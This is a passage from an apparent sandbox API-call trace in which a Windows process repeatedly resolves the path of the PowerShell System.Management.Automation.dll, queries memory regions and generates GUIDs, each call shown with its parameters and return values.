lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.531] VirtualQuery (in: lpAddress=0xeb340, lpBuffer=0xec200, dwLength=0x30 | out: lpBuffer=0xec200*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.532] VirtualQuery (in: lpAddress=0xeb3d0, lpBuffer=0xec290, dwLength=0x30 | out: lpBuffer=0xec290*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.532] VirtualQuery (in: lpAddress=0xeb5f0, lpBuffer=0xec4b0, dwLength=0x30 | out: lpBuffer=0xec4b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.532] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x902554b1, Data2=0xe9a6, Data3=0x434c, Data4=([0]=0xb8, [1]=0xea, [2]=0xf4, [3]=0x3e, [4]=0xb8, [5]=0x16, [6]=0x6f, [7]=0xc7))) returned 0x0 [0085.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.533] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x478aa35d, Data2=0x6ffd, Data3=0x4db3, Data4=([0]=0xbb, [1]=0xee, [2]=0xe9, [3]=0x58, [4]=0xec, [5]=0x76, [6]=0x6b, [7]=0xb0))) returned 0x0 [0085.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.534] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x2a0f0cbf, Data2=0xb44a, Data3=0x4211, Data4=([0]=0xbf, [1]=0x4d, [2]=0x84, [3]=0x69, [4]=0x7f, [5]=0xea, [6]=0xea, [7]=0x65))) returned 0x0 [0085.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.535] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x5fed4c32, Data2=0xc676, Data3=0x434c, Data4=([0]=0x82, [1]=0x86, [2]=0xbf, [3]=0x3c, [4]=0xd9, [5]=0xef, [6]=0xc8, [7]=0x11))) returned 0x0 [0085.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.536] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xa3d40da0, Data2=0x3feb, Data3=0x4d48, Data4=([0]=0x9d, [1]=0xb9, [2]=0xb8, [3]=0xfd, [4]=0x26, [5]=0x8e, [6]=0x60, [7]=0xf6))) returned 0x0 [0085.536] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xbd7324b4, Data2=0x5628, Data3=0x4a15, Data4=([0]=0xb4, [1]=0x8e, [2]=0xcd, [3]=0x99, [4]=0x17, [5]=0xc8, [6]=0x83, [7]=0xd0))) returned 0x0 [0085.536] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x79335168, Data2=0x6910, Data3=0x48fa, Data4=([0]=0x9c, [1]=0x41, [2]=0x44, [3]=0xad, [4]=0xa3, [5]=0x39, [6]=0x40, [7]=0x9c))) returned 0x0 [0085.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.537] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xa53879d3, Data2=0xeedb, Data3=0x4bf1, Data4=([0]=0x84, [1]=0xcb, [2]=0xa3, [3]=0x0, [4]=0x88, [5]=0xe4, [6]=0x45, [7]=0xaf))) returned 0x0 [0085.537] VirtualQuery (in: lpAddress=0xeb1b0, lpBuffer=0xec070, dwLength=0x30 | out: lpBuffer=0xec070*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.537] 